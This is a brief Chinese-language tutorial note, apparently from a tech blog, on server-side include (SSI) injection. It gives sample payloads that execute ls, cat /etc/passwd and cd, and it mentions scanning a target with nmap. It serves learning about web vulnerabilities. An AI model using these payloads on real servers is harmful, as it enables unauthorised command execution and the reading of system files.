ssi注入

  ssi注入就是尋找一個輸入點輸入類似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令。 如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" -->  切換目錄<!--#exec cmd="cd /root/dir/" -->   像正常一樣先ifconfig掃描出自己的IP,然後nmap -sV 攻擊機IP
相關文章
相關標籤/搜索